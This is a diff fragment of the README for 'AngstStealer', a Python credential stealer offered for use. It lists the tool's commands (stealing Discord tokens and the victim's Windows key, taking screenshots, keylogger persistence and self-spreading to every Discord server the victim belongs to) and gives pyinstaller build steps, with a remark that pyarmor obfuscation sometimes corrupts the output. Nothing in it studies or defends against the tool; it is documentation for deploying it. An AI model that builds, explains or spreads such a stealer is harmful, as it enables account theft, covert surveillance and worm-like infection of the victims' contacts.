TasosY2K/AngstStealer/README.md

 windows -> Give information about your victim & includes the windows key</br>
 discord -> Steal discord tokens</br>
 screenshot -> takes a screenshot</br>
+postexploit -> persistance with keylogger</br>
+discordspread -> sends itself in all servers user is in</br>
 </br>
 6. Run one of the following commands listed below, it is worth noting that pyarmor will sometimes corrupt the executable so if you plan on using the pyarmor command you should test it locally to make sure it works.</br>
 `PYINSTALLER: pyinstaller --onefile --hidden-import=pkg_resources.py2_warn angst.py`</br>